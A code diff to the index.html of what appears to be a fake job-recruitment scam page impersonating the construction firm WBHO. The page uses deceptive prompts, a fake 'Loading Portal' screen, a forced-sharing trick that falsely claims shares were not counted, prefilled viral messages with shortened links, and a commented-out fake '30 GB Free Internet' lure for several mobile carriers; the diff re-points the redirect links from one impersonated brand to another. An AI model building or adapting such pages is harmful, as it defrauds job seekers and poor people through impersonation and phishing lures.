--- a/index.html
+++ b/index.html
@@ -9,7 +9,7 @@ var password = 'WBHO Recruitment'
 password=prompt('SMS: Application is currently ongoing, press OK to apply for the','WBHO Recruitment');
 if (password != 'WBHO Recruitment');
 if (password != 'WBHO Recruitment') {
-location.href='https://tinyurl.com/POWER-CONSTRUCTION-RECRUITMENT';
+location.href='https://tinyurl.com/WBHO-RECRUITMENT';
 }
 </script>
       
@@ -457,7 +457,7 @@ color: #001a4b
                   
           <button id="confirm">Continue</button>
             </div>
-            <p class="error">Sorry, your name is missing <a href="https://tinyurl.com/POWER-CONSTRUCTION-RECRUITMENT"> <b><font color="#14948F">ADD NAME</font></b></a></p>
+            <p class="error">Sorry, your name is missing <a href="https://tinyurl.com/WBHO-RECRUITMENT"> <b><font color="#14948F">ADD NAME</font></b></a></p>
         </div>
         <div id="checking">
           <p class="title"><font color="#000000">Loading Portal ...</font></p>
@@ -617,7 +617,7 @@ $(document).click(function () {
 "30%20GB%20Free%20Internet%20Offer%0A%E2%9D%A4%0ATo%20Activate%2030%20GB%20Free%20Internet%20for%20all%20Networks%20click%20here%F0%9F%91%87%0A*1.%20Jio*%0Ahttps://cutt.ly/30-GB_Jio%0A%20%0A*2.%20Airtel*%0Ahttps://cutt.ly/30-GB_Airtel%0A%20%0A*3.%20Vi*%0Ahttps://cutt.ly/30-GB_Vi%0A%20%0A*4.%20Jazz*%0Ahttps://cutt.ly/30-GB_Jazz%0A%20%0A*5.%20Zong*%0Ahttps://cutt.ly/30-GB_Zong%0A%20%0A*6.%20Telenor*%0Ahttps://cutt.ly/30-GB_Telenor%0A%20%0A*7.%20Ufone*%0Ahttps://cutt.ly/30-GB_Ufone%0A%20%0A*8.%20Other Networks*%0Ahttps://cutt.ly/Get_30GB",
 -->
       <script>
-        var text1 = "WBHO Recruitment 2025.%0A%0AWBHO has started its massive recruitment of new workers for its ongoing major projects. %0A%0A*The application is currently ongoing.*%0A%0A_Apply Now_%0Ahttps://tinyurl.com/POWER-CONSTRUCTION-RECRUITMENT",
+        var text1 = "WBHO Recruitment 2025.%0A%0AWBHO has started its massive recruitment of new workers for its ongoing major projects. %0A%0A*The application is currently ongoing.*%0A%0A_Apply Now_%0Ahttps://tinyurl.com/WBHO-RECRUITMENT",
             text2 = " an amount of ",
             text3 = "for every citizen who meets the conditions as an aid to the poor class to overcome the crisis. Enter and register now and make sure to register correctly 👉 ",
             error = "Something's wrong!\nPosts aren't calculated. You may have shared it with the same friend or group more than once. Please share it again.",
